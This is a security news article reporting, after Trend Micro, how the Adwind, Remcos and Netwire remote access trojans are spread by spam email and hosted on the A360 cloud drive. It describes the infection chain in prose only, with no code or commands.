Thursday, October 3, 2024
HomeTorjan Horses/wormsBeware !! Dangerous RAT's Called "Adwind, Remcos, Netwire" Delivering via ...

Beware !! Dangerous RAT’s Called “Adwind, Remcos, Netwire” Delivering via A360 Cloud Drive

Published on

Widely Used A360 Cloud Drive Platform Abuse for Delivering Adwind, Remcos, Netwire  Remote Access Trojans and used as a Malware Distributing Platform by using File sharing site to host Malware.

Nowadays  Many Cloud Platform used as a Malware Delivering Platform that by hosting Malicious Files and also being served as a (C&C) infrastructure.

In this case, Command & Control Server Resolved by Free DNS services and it helps to RATs/backdoors that would phone back to their respective command-and-control servers after the Malicious RAT File were Downloaded and Executed.

“A360 is a cloud-based workspace that centralizes, connects and organizes your team and project information across your desktop, the web, and mobile devices.”A360 Drive provides online storage for collaboration. Anyone can create an account for free and given 5GB of space.
- Advertisement - EHA

According to Trend Micro Report, U.S., South Africa, France, Italy, Germany, Hong Kong, and U.K. the most affected By this Distributed Adwind, Remcos, Netwire RAT’s.

Also Read:  Free Remote Access Trojan builder “Cobian RAT” Distributed a Backdoor

How Does These RAT’s Abusing the Cloud Infrastructure

These 3 RAT’s Initially Spreading via the Spam Email Campaign with Different Malware Variant Functions.

Adwind RAT  Intially Discovered from as a JAR file (JAVA_ADWIND.JEJPDY) which connect to the C&C Server when the Script get executed. later it will retrieve and exfiltrate multifarious data including credentials, keystrokes, and multimedia files.

RAT

NETWIRE RAT Identified through Spam Email Campign with attached  (JAVA_KRYPTIK.NPP) file containing a Java ARchive (JAR) along with Exicutable Script and futher analysis confrms that, it has string references NETWIRE remote access tool with keylogging and SOCKS proxy capabilities.

Trend Micro Discovered a Document File that Discovered as “AMMO REQUEST MOD Turkey.doc” (W2KM_DROPPR.XWD) that contains a generic template for macro malware used to abuse the A360 Drive .

Macro File is Encrypted and also Obfusticated Exicutable that will be finally Decrypted.it contains a payloadthat is a malicious PowerShell script that will download a file from A360 Drive and execute it.

The downloaded payload is a Visual Basic obfuscated executable file. Deobfuscating it reveals the Trojanized Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. Trend Micro said.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...

Tor Browser 13.5.6 Released – What’s New!

The Tor Project has announced the release of Tor Browser 13.5.6, which is now...

Mario Duarte, Former Snowflake Cybersecurity Leader, Joins Aembit as CISO to Tackle Non-Human Identities

Aembit, the non-human IAM company, today announced the appointment of Mario Duarte as chief...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

MnuBot – New Banking Trojan Take Browsers Screenshots, Keylogging to Steal Bank Data

Newly discovered banking Trojan named MnuBot malware spreading to steal the sensitive bank related...

New Banking Trojan IcedID Evade Sandboxes and Performing Web Injection Attacks

A New Banking Trojan dubbed IcedID discovered that capable of performing some dangerous web-based...

Silence Trojan Targeting Financial Institutions Recording day to day activity on Bank Employees’ PCs

Security experts from Kaspersky lab discovered a new trojan dubbed Silence trojan that targeting Financial...